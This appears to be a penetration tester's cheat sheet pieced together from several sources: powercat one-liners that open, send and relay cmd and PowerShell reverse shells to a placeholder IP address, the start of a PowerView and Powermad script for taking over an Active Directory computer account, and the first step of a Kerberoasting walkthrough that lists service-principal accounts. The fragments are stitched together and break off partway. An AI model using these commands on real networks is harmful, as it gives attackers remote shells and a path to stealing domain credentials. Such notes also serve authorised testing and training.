- Slides
- Video
Stuart McMurray:
Serve a cmd Shell:
    powercat -l -p 443 -e cmd
Send a cmd Shell:
    powercat -c <REPLACE IP ADDRESS> -p 443 -e cmd
Send a powershell:
    powercat -c <REPLACE IP ADDRESS> -p 443 -ep
Send a powershell UDP:
    powercat -c <REPLACE IP ADDRESS> -p 443 -ep -u
TCP Listener to TCP Client Relay:
    powercat -l -p 8000 -r tcp:<REPLACE IP ADDRESS>:443
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
#     Get  : retrieve full raw data sets
#     Find : 'find' specific data entries in a data set
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
101 Kerberoasting Powerview & Mimikatz

1. Look for a service that is running with a user account and take note of the "ServicePrincipalName"
    Get-NetUser -SPN

Sample Output:
    <---Guidem snip--->
    serviceprincipalname : MSSQLSvc/guidem.kingdom.local   < look for this
    givenname            : guidemsql
    lastlogon            : 4/6/2020 12:38:15 AM